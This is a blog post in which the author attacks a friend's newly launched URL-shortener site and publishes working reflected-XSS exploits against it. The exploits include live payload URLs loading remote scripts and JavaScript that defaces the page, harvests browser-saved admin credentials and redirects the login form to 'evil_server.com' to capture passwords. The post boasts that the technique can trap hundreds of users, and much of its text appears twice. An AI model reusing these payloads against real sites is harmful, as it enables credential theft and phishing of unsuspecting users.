Yesterday, Djerad Sofiane started a new url shortening website called Shr1rink.me (yeah you get it, shrink me) using the open source project yourls. So I tried to see how secure it was, and after a while I found few vulnerabilities, I also promised Sofiane to show him live examples of how-to exploit them –he is kinda newbie :D, nah seriously, he is a cool guy, check his blog out-
Ok, first I discovered that I can shrink links from the website itself, so an evil idea came to my mind, a DoS attack, I wanted to make the webserver loop infinitely to find the website. For example I shortened the url http://shr1nk.me/1235 and pointed it to http://shr1nk.me/1234 and vice versa
I thought this would make the server loop over and over to find the original link, but nah, it doesn’t work like that, the server just send the original –the shortened- url back to the browser, and it’s the browser’s work to fetch the new url. So this is useless because even the browser detects redirect loops (5 loops and it break the request) http://en.wikipedia.org/wiki/URL_redirection#Redirect_loops
Now to XSS, a simple check shows that the website is XSS’able, here’s a simple alert() test alert(1)'>http://shr1nk.me/index.php?url="></a><script>alert(1)</script>, it doesn’t work for me in Google Chrome, so Firefox it.
Let’s explore 3 categories of attacks that might be exploited using XSS, of course combining these techniques will have bigger impact.
For example if you click this link http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868120.txt%3E%3C/script%3E, you should get something like this.
You can see that for an ordinary user, seeing this on his favorite website is totally a big deal –haven’t you heard about the Facebook’s stupid users?? check it out -.
http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868131.txt%3E%3C/script%3E
The idea is to show the victim a login page, and changing the action of the form to point to the attackers' server rather than the real login page, a simple attack would be exploited like this:
Believe me, it works, and you can trap hundred of users using this technique since it is completely transparent, and it leaves no trace because the user end up signing in as he is supposed to be.
I’m aware this was not detailed enough, but the subject is really vast, so if you plan to learn XSS, start applying simple attacks, like the first and second listed here (you have a working source code). Then you will start to see clearly how some advanced attacks –like the last one- are exploited. Also I advise this book : http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/1597491543.
Ok, first I discovered that I can shrink links from the website itself, so an evil idea came to my mind, a DoS attack, I wanted to make the webserver loop infinitely to find the website. For example I shortened the url http://shr1nk.me/1235 and pointed it to http://shr1nk.me/1234 and vice versa
I thought this would make the server loop over and over to find the original link, but nah, it doesn’t work like that, the server just send the original –the shortened- url back to the browser, and it’s the browser’s work to fetch the new url. So this is useless because even the browser detects redirect loops (5 loops and it break the request) http://en.wikipedia.org/wiki/URL_redirection#Redirect_loopsNow to XSS, a simple check shows that the website is XSS’able, here’s a simple alert() test alert(1)'>http://shr1nk.me/index.php?url="></a><script>alert(1)</script>, it doesn’t work for me in Google Chrome, so Firefox it.
Let’s explore 3 categories of attacks that might be exploited using XSS, of course combining these techniques will have bigger impact.
Reputation :
We can make a websites’ reputation as bad as we want, by inserting inappropriate content, or post false news etc.. Remember! users have to click your link to see this, because it is not a persistent XSS attack.For example if you click this link http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868120.txt%3E%3C/script%3E, you should get something like this.
- //Write some annoying messages
- var b = document.getElementById('contenu');
- var s = "<h1>SOME STRANGE MESSAGE HERE!</h1>";
- b.innerHTML = s + <img src='some evil pirate image here'/>
Password Theft :
I have explained this in details here http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html, and here is a simple customized version of how to steel the admin passwords if they are saved by the browser, transparently. The victim has to just click of the link and BOM!!!!http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868131.txt%3E%3C/script%3E
- var frameset = document.createElement('frameset');
- var frame1 = document.createElement('frame');
- document.body.appendChild(frameset);
- frame1.setAttribute('src','admin/');
- frameset.appendChild(frame1);
- function showLogin()
- {
- alert('login : ' + parent.frames[0].document.getElementById('username').value +
- '\npass : '+parent.frames[0].document.getElementById('password').value);
- }
- setTimeout(showLogin,1000);
- // here, send the logins to the attackes server using XHR
Trapping the victim to submit his logins :
This uses the same technique as the password theft, When combined with the previous one it become so dangerous unless the user is aware of how XSS works or has an XSS blocker like NoScript or is using IE8.The idea is to show the victim a login page, and changing the action of the form to point to the attackers' server rather than the real login page, a simple attack would be exploited like this:
- var frameset = document.createElement('frameset');
- var frame1 = document.createElement('frame');
- document.body.appendChild(frameset);
- frame1.setAttribute('src','admin/');
- frameset.appendChild(frame1);
- // HERE make the faked iFrame stretched to hide the real page
- // using the stype attribute
- //Now change the action of the form to point to the victims server
- // or do it using XHR then submit the form to its real action
- parent.frames[0].document.forms[0].action = "http://evil_server.com/intercept_passwords.aspx";
- // here, send the logins to the attackes server using XHR
I’m aware this was not detailed enough, but the subject is really vast, so if you plan to learn XSS, start applying simple attacks, like the first and second listed here (you have a working source code). Then you will start to see clearly how some advanced attacks –like the last one- are exploited. Also I advise this book : http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/1597491543.
